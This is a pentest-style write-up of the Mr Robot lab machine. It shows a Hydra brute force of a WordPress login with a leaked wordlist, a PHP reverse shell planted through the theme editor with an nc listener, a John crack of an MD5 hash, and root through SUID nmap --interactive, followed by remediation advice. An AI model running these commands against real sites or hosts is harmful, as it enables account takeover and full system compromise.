Case file

WordPress brute force, robot hash crack, and SUID nmap root

Intermediate Linux engagement: robots.txt leaked a wordlist and first artifact; Hydra recovered elliot’s WordPress password for a theme-editor shell; robot’s MD5 cracked for su; SUID nmap --interactive completed root.

Intermediate28 minLinux · WordPress · Hydra · Privilege Escalation
01

Engagement summary

robots.txt and a custom dictionary enabled WordPress credential recovery. Post-auth theme edit yielded www-data; robot’s password hash and SUID nmap finished the path to root.

MR ROBOT exposed WordPress on 80/443. robots.txt advertised fsocity.dic and key-1-of-3.txt. After sorting the dictionary we sprayed wp-login.php: username elliot, password ER28-0652 (also recoverable from a base64 string on a license page). Appearance → Editor accepted a PHP reverse shell. /home/robot/password.raw-md5 was world-readable; John cracked it to abcdefghijklmnopqrstuvwxyz for su robot. find showed SUID nmap 3.81; nmap --interactive then !sh returned a root shell.

Business impact

Leaked wordlists and weak WordPress passwords are account takeover. Theme editing is RCE. World-readable password hashes and ancient SUID nmap are root. Remove robots leaks, enforce MFA and strong WP passwords, disable theme editing, fix home permissions, and remove SUID from nmap.

02

robots leak and WordPress spray

fsocity.dic plus Hydra recovered elliot:ER28-0652 on wp-login.php.

OPERATOR · RECON

savvy@lab:~$ nmap -sC -sV -Pn 10.10.50.10

80/tcp open http

443/tcp open https

savvy@lab:~$ curl http://10.10.50.10/robots.txt

fsocity.dic

key-1-of-3.txt

savvy@lab:~$ sort fsocity.dic | uniq > fsocity-sorted.dic

OPERATOR · HYDRA

savvy@lab:~$ hydra -L fsocity-sorted.dic -p test 10.10.50.10 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username"

login: elliot

savvy@lab:~$ hydra -l elliot -P fsocity-sorted.dic 10.10.50.10 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered"

login: elliot password: ER28-0652

03

Theme editor shell and robot hash

PHP reverse shell via theme editor; cracked robot MD5 for local su.

OPERATOR · SHELL / ROBOT

# WP Admin → Appearance → Editor → paste PHP reverse shell into 404.php

savvy@lab:~$ nc -lnvp 4444

savvy@lab:/var/www/html$

savvy@lab:~$ cat /home/robot/password.raw-md5

savvy@lab:~$ john --format=Raw-MD5 --wordlist=rockyou.txt hash.txt

abcdefghijklmnopqrstuvwxyz (robot)

savvy@lab:~$ su robot

savvy@lab:~$

04

SUID nmap interactive root

nmap --interactive accepted !sh and dropped a root shell.

OPERATOR · NMAP SUID

savvy@lab:~$ find / -perm -u=s -type f 2>/dev/null

/usr/local/bin/nmap

savvy@lab:~$ nmap --interactive

nmap> !sh

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Remove sensitive paths from robots.txt. Harden WordPress authentication and disable file editing. Store password hashes with proper permissions. Upgrade nmap and never ship it SUID.